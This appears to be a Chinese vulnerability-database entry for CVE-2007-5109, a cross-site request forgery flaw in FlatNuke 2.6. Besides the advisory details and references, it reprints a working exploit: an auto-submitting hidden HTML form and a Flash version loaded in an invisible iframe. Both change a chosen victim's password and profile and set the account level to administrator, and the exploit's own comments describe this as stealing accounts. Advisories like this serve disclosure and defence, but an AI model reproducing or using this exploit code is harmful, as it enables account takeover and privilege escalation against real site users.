FlatNuke FlatNuke FlatNuke 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189025 漏洞类型 跨站请求伪造
发布时间 2007-09-26 更新时间 2007-09-27
CVE编号 CVE-2007-5109 CNNVD-ID CNNVD-200709-371
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2007090092
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-371
|漏洞详情
FlatNuke2.6,以及可能的FlatNuke3中的index.php存在跨站请求伪造漏洞,允许远程攻击者借助user参数和(1)regpass和(2)一个none_Login操作的level参数修改任意账号密码和权限等级。例如使用Flash对象来自动产生请求。
|漏洞EXP
/* hackflatnuke.txt
 *
 * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified)
 *
 * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin
 *
 * Requirements: - You have to know the nickname of the account u want to steal or change             
 *    
 */

HTML version  modifiable	
	
	
	<!-- flatnuke.html-->
	<html>
	<body>
	<title>Hack FlatNuke</title>
		<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login">
			<input type="hidden" name="action" value="saveprofile">
			<input type="hidden" name="user" value="VICTIM">
			<input type="hidden" name="regpass" value="NEW_PASS">
			<input type="hidden" name="anag" value="NAME">
			<input type="hidden" name="homep" value="VICTIM_SITE">
			<input type="hidden" name="prof" value="PROFESSION">
			<input type="hidden" name="prov" value="ORIGIN">
			<input type="hidden" name="ava" value="blank.png">
			<input type="hidden" name="url_avatar" value="">
			<input type="hidden" name="firma" value="VICTIM">
			<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator">
		</form>
	<script> document.body.onload = document.forms[0].submit(); </script>	
	</body>
	</html>
	<!-- Byez -->

Flash versione that you have to export in a swf and import in a iframe

exploit.swf

var action:String = "saveprofile";
    var user:String = "nome_user_che_modifichiamo";
    var regpass:String = "nuova_pass";
    var anag:String = "nome";
    var homep:String = "sito_utente";
    var prof:String = "professione";
    var prov:String = "provenienza";
    var ava:String = "blank.png";
    var url_avatar:String = "";
    var firma:String = "firma_utente";
    var level:String = "livello da 1 a 10 N.B 10=amministartore";
    getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST");

hackflatnuke.html

<html>
    <head>
    <title>Title</title>
    </head>
    <body bgcolor="000000">
    <center>
    <font face="Verdana" size="5" color="#FF0000">
    Hack FlatNuke
    </font>
    
    
    <iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
    </center>
    </body>
    </html>
|参考资料

来源:BUGTRAQ
名称:20070924ArbitraryCommandInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/480468/100/0/threaded
来源:XF
名称:flatnuke-mod-security-bypass(36763)
链接:http://xforce.iss.net/xforce/xfdb/36763
来源:BID
名称:25817
链接:http://www.securityfocus.com/bid/25817
来源:SREASON
名称:3176
链接:http://securityreason.com/securityalert/3176
来源:SECUNIA
名称:26957
链接:http://secunia.com/advisories/26957